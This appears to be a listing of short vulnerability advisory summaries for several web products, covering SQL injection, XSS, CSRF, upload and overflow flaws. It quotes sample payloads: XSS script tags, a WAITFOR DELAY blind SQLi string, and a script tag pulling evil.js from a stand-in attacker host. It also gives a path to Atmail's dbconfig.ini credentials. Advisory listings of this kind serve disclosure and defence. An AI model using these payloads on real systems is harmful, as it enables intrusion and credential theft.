A Blind SQL Injection vulnerability exists in Symantec Web Gateway 5.0.3.18. An attacker can exploit this vulnerability by accessing certain URLs which will create a new trigger that will create a user account on the victim database. An authenticated user can initiate a reboot of the remote system by accessing the URL which will execute the trigger and create a new user account.
This exploit is a time-based blind SQL injection vulnerability in Symantec Web Gateway 5.0.2. It allows an attacker to extract the admin hash from the users table in the database. The exploit uses a loop to iterate through each character of the hash, and a BENCHMARK() function to measure the time taken to execute the query. If the query takes longer than the specified time, the character is assumed to be correct.
You can Access All Atmail Webadmin Mail server Configuration and SQL Root Password by going to the webmail and config Directory and typing dbconfig.ini for Access all SQL Configuration
An attacker can modify their snmpd.conf file with malicious JavaScript as follows: sysName <script>alert(124)</script>pt>> In addition, there is a Blind SQL Injection vulnerability in the file 'WrVMwareHostList.asp'. By sending a specially crafted malicious JavaScript payload, the SQLi can be exploited to add a new database administrator to the system, leading to remote code execution. Blind SQLi Proof of Concept: WrVMwareHostList.asp?sGroupList=1;WAITFOR DELAY '0:0:10'--&sDeviceList=3 The JavaScript code below will exploit the blind SQL injection vulnerability, enable xp_cmdshell on the target, upload a reverse shell to the target, and execute it.
A SQL injection vulnerability exists in Dell SonicWALL Scrutinizer 9.0.1. The vulnerability is due to insufficient sanitization of user-supplied input in the 'q' parameter of the 'statusFilter.php' script. An attacker can exploit this vulnerability to execute arbitrary SQL commands in the context of the application. This may allow the attacker to gain access to sensitive information stored in the database.
This module exploits a vulnerability found in EGallery 1.2 By abusing the uploadify.php file, a malicious user can upload a file to the egallery/ directory without any authentication, which results in arbitrary code execution. The module has been tested successfully on Ubuntu 10.04.
This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user can send a long string data in the Connection Header to causes an overflow on the stack when function vsprintf() is used, and gain arbitrary code execution. The module has been tested successfully on Windows 7 SP1 and Windows XP SP3.
SolarWinds Orion Network Performance Monitor (NPM) is vulnerable to persistent XSS when scanning a remote system containing malicious JavaScript in its snmpd.conf file. The vulnerable fields were determined to be: syslocation <script>alert('location')</script>, syscontact <script>alert('contact')</script>, sysName <script>alert('name')</script>. In addition, NPM is also vulnerable to CSRF attacks despite the fact that it makes use of VIEWSTATE protection. Through a combination of XSS and CSRF, a user can be added to the web application by configuring the snmpd.conf file to point to an attacker-controlled JavaScript file: syscontact <script src="http://attacker/evil.js"></script>
X-Cart Gold implements a degree of XSS filtering but it is incomplete. The "symb" parameter of "products_map.php" is vulnerable to XSS and can be bypassed by using HTML anchor methods and URL encoding.
By sending an email to a user with the Atmail administrative interface open, we can call a remote JavaScript file that will initiate the installation of a specially crafted plugin file via CSRF, enabling remote code execution on the Atmail server.
Services By CQR